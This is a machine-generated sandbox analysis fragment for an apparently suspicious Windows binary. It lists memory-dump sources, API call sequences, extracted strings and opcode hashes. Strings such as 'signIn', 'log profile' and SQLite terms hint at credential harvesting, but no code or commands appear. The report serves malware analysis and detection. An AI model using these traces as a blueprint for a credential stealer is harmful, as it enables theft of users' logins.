                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                • API String ID: 3510742995-3273207271
                                                                                                                                                                • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                                • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                                                                                                • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                                • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,004133E1,00000000,00000000), ref: 00413A7A
                                                                                                                                                                • memset.MSVCRT ref: 00413ADC
                                                                                                                                                                • memset.MSVCRT ref: 00413AEC
                                                                                                                                                                  • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                • memset.MSVCRT ref: 00413BD7
                                                                                                                                                                • wcscpy.MSVCRT ref: 00413BF8
                                                                                                                                                                • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,00000000), ref: 00413C4E
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                                                                • String ID: 3A
                                                                                                                                                                • API String ID: 3300951397-293699754
                                                                                                                                                                • Opcode ID: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                                                                                                                                • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                                                                                                • Opcode Fuzzy Hash: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                                                                                                                                • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                                                                • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                  • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                                                                  • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                                                                • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                                                                • LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                                                                • memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                                                                                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                                                                                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                                                                                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                                • String ID: strings
                                                                                                                                                                • API String ID: 3166385802-3030018805
                                                                                                                                                                • Opcode ID: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                                                                                                                                • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                                                                                • Opcode Fuzzy Hash: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                                                                                                                                • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 00411AF6
                                                                                                                                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                                                                                • wcsrchr.MSVCRT ref: 00411B14
                                                                                                                                                                • wcscat.MSVCRT ref: 00411B2E
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                                                                • String ID: AE$.cfg$General$EA
                                                                                                                                                                • API String ID: 776488737-1622828088
                                                                                                                                                                • Opcode ID: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                                                                                                                • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                                                                                                • Opcode Fuzzy Hash: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                                                                                                                • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 0040D8BD
                                                                                                                                                                • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                                                                                • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                                                                                • memset.MSVCRT ref: 0040D906
                                                                                                                                                                • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                                                                                • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                                                                                  • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                                                                                  • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                                                                • String ID: sysdatetimepick32
                                                                                                                                                                • API String ID: 1028950076-4169760276
                                                                                                                                                                • Opcode ID: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                                                                                                                • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                                                                                • Opcode Fuzzy Hash: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                                                                                                                • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                                • String ID: -journal$-wal
                                                                                                                                                                • API String ID: 438689982-2894717839
                                                                                                                                                                • Opcode ID: 070149fd6e6b60b17c82d9fb7164138c534913cb2d5c63aa2997da2af33d5e6c
                                                                                                                                                                • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                                                                                • Opcode Fuzzy Hash: 070149fd6e6b60b17c82d9fb7164138c534913cb2d5c63aa2997da2af33d5e6c
                                                                                                                                                                • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                                                                                                • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                                                                                                • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                                                                                  • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                                                                                  • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                                                                                                • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                                                                                                • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Item$Dialog$MessageSend
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3975816621-0
                                                                                                                                                                • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                                • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                                                                                                • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                                • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • _wcsicmp.MSVCRT ref: 00444D09
                                                                                                                                                                • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                                                                                                • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                  • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                                                                                • String ID: .save$http://$https://$log profile$signIn
                                                                                                                                                                • API String ID: 1214746602-2708368587
                                                                                                                                                                • Opcode ID: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                                                                                                                • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                                                                                                • Opcode Fuzzy Hash: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                                                                                                                • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2313361498-0
                                                                                                                                                                • Opcode ID: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                                                                                                                                • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                                                                                                • Opcode Fuzzy Hash: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                                                                                                                                • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                                                                                                • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                                                                                                • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                                                                                  • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                                                                                                • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                                                                                                • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                                                                                                • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                                                                                                • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                                                                                                • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$ItemMessageRectSend$Client
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2047574939-0
                                                                                                                                                                • Opcode ID: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                                                                                                                • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                                                                                                • Opcode Fuzzy Hash: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                                                                                                                • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                  • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                                                                                                                                                                  • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                                                                                                                                                                • memcpy.MSVCRT ref: 0044A8BF
                                                                                                                                                                • memcpy.MSVCRT ref: 0044A90C
                                                                                                                                                                • memcpy.MSVCRT ref: 0044A988
                                                                                                                                                                  • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                                                                                                                                                                  • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                                                                                                                                                                • memcpy.MSVCRT ref: 0044A9D8
                                                                                                                                                                • memcpy.MSVCRT ref: 0044AA19
                                                                                                                                                                • memcpy.MSVCRT ref: 0044AA4A
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                                • String ID: gj
                                                                                                                                                                • API String ID: 438689982-4203073231
                                                                                                                                                                • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                                                                                • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                                                                                                • API String ID: 3510742995-2446657581
                                                                                                                                                                • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                                                                • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                                                                                                • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                                                                • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                                                                                • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                                                                                • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                                                                                • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                                                                                • memset.MSVCRT ref: 00405ABB
                                                                                                                                                                • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                                                                                • SetFocus.USER32(?), ref: 00405B76
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4281309102-0
                                                                                                                                                                • Opcode ID: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                                                                                                                                • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                                                                                                • Opcode Fuzzy Hash: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                                                                                                                                • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _snwprintfwcscat
                                                                                                                                                                • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                • API String ID: 384018552-4153097237
                                                                                                                                                                • Opcode ID: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                                                                                                                                                • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                                                                                                • Opcode Fuzzy Hash: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                                                                                                                                                • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                                                                • String ID: 0$6
                                                                                                                                                                • API String ID: 2029023288-3849865405
                                                                                                                                                                • Opcode ID: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                                                                                                                                • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                                                                                                • Opcode Fuzzy Hash: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                                                                                                                                • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                                                                                • memset.MSVCRT ref: 00405455
                                                                                                                                                                • memset.MSVCRT ref: 0040546C
                                                                                                                                                                • memset.MSVCRT ref: 00405483
                                                                                                                                                                • memcpy.MSVCRT ref: 00405498
                                                                                                                                                                • memcpy.MSVCRT ref: 004054AD
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memset$memcpy$ErrorLast
                                                                                                                                                                • String ID: 6$\
                                                                                                                                                                • API String ID: 404372293-1284684873
                                                                                                                                                                • Opcode ID: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                                                                                                                                • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                                                                                • Opcode Fuzzy Hash: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                                                                                                                                • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                                                                • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                                                                • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                                                                • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                                                                • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                                                                • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                                                                • wcscpy.MSVCRT ref: 0040A107
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1331804452-0
                                                                                                                                                                • Opcode ID: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                                                                                                                                • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                                                                                • Opcode Fuzzy Hash: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                                                                                                                                • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
